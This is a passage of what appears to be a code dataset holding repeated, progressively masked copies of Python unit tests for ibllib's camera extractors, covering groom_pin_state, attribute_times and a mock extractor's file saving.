def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n 
np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass MockExtracor(BaseExtractor):\n <assignment token>\n <assignment token>\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n 
np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass MockExtracor(BaseExtractor):\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as 
plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, 
audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n <function token>\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = 
audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n <function token>\n <function token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = 
np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in 
range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n 